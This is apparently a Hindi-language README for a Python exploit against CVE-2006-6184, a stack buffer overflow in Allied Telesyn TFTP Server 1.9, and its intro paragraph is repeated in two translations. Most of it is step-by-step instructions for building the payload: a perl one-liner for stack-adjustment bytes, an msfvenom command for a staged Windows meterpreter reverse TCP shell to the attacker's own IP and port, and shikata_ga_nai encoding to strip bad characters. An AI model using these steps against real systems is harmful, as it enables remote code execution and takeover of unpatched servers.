
यह CVE-2006-6184 के लिए एक python-आधारित स्टैंडअलोन एक्सप्लॉइट है। यह एक्सप्लॉइट Allied Telesyn TFTP Server (AT-TFTP) 1.9, और संभवतः पुराने संस्करणों में स्टैक-आधारित बफर ओवरफ्लो ट्रिगर करता है, जो दूरस्थ हमलावरों को सेवा से वंचित (denial of service) करने या मनमाना कोड निष्पादित करने की अनुमति देता है।
यह CVE-2006-6184 के लिए एक पायथन-आधारित स्वतंत्र शोषण है। यह शोषण Allied Telesyn TFTP सर्वर (AT-TFTP) 1.9, और संभवतः पहले के संस्करणों में स्टैक-आधारित बफर ओवरफ्लो को ट्रिगर करता है, जिससे दूरस्थ हमलावर सेवा से वंचित कर सकते हैं या मनमाना कोड निष्पादित कर सकते हैं।
पेलोड को आपके स्वयं के आईपी पते और सुनने वाले पोर्ट को शामिल करने के लिए अनुकूलित किया जाना चाहिए, इसलिए आपको इसे मैन्युअल रूप से उत्पन्न करने की आवश्यकता होगी। ऐसा करने के लिए, निम्नलिखित चरणों का उपयोग करें:
1.) स्टैक पॉइंटर (3500) से घटाने के लिए आवश्यक राशि का हेक्स फ़ाइल बनाने के लिए निम्नलिखित दर्ज करें:
perl -e 'print "\x81\xec\xac\x0d\x00\x00"' > stackadj
2.) इसके बाद, एक स्टेज्ड मीटरप्रेटर शेल पेलोड बनाने के लिए निम्नलिखित कमांड का उपयोग करें:
msfvenom -p windows/meterpreter/reverse_nonx_tcp LHOST=[your IP] LPORT=[your port] R > payload
3.) फिर, आपके द्वारा अभी बनाई गई दो फ़ाइलों को संयोजित करें:
cat stackadj payload > shellcode
4.) अंत में, खराब वर्णों को हटा दें:
msfvenom -p generic/custom PAYLOADFILE=./shellcode -b "\x00" -e x86/shikata_ga_nai -f python
आउटपुट को "payload" वेरिएबल के मान के रूप में दर्ज करें। इस शोषण को काम करने के लिए आपको इसे कुछ बार चलाने की आवश्यकता हो सकती है।